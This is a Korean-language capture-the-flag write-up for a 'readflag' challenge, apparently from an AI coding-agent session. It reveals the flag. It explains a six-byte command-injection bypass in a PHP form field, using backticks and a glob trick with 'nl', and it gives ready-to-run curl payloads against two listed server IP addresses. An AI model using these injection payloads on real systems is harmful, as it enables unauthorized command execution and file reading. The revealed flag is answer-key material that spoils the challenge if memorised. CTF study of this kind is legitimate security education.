Name : readflag
Desc :
can you read flag?

    server 1 : http://118.46.2.123:9999/
    server 2 : http://43.203.106.92:14444/
 
Writeup 
 
 Flag : HCAMP{0aeb0f4a8a00e191005ebcc21e6d3936}                                                         
                                                                                                  
  ---                                                                                             
  취약점 분석 요약                                                                                

  취약점: Command Injection (6바이트 제한)                                                        
                                                                                                  
  공격 대상: Device Tag 입력 필드 (POST tag 파라미터)                                             
                                                                                                  
  서버 동작:
  1. PHP 백엔드가 tag 값을 6바이트로 잘라냄 (substr($tag, 0, 6))
  2. shell_exec("echo " . $tag) 형태로 실행 (추정)
  3. ;, |, && 같은 셸 메타문자는 필터링되지만, 백틱(`)과 $()는 필터링되지 않음
  4. 결과가 HTML에 이스케이프 없이 반영됨

  공격 페이로드 (2단계)

  Step 1 - 현재 디렉토리에 nl 이름의 파일 생성:
  tag=`>nl`
  (`>nl` = 5바이트, >nl은 빈 파일을 생성하는 셸 리다이렉트)

  Step 2 - glob trick으로 플래그 파일 읽기:
  tag=`* /*`
  (`* /*` = 6바이트)
  - * → 현재 디렉토리의 nl로 확장 (명령어)
  - /* → 루트 디렉토리의 모든 파일로 확장 (인자) → 플래그 파일 포함

  nl 명령어는 파일 내용을 줄번호와 함께 출력하므로, 디렉토리는 무시하고 /flag_* 파일의 내용이
  출력됩니다.

✻ Crunched for 6m 49s

❯ 그래서 전체 페이로드를 알려줘                                                                   
                                
⏺ 전체 페이로드                                                                                   
                                                                                                
  동일 세션(쿠키 유지)으로 POST 요청 2번을 보내면 됩니다.                                         
                  
  1단계: nl 파일 생성                                                                             
                  
  curl -c cookies.txt -b cookies.txt -X POST --data-urlencode 'tag=`>nl`'
  http://43.203.106.92:14444/

  2단계: 플래그 읽기

  curl -c cookies.txt -b cookies.txt -X POST --data-urlencode 'tag=`* /*`'
  http://43.203.106.92:14444/

  원리

  단계: 1
  페이로드: `>nl`
  바이트: 5B
  셸에서 일어나는 일: >nl → 현재 디렉토리에 빈 파일 nl 생성
  ────────────────────────────────────────
  단계: 2
  페이로드: `* /*`
  바이트: 6B
  셸에서 일어나는 일: * → nl로 확장, /* → 루트 전체 파일로 확장 → nl /flag_xxx ... 실행 → 플래그
    출력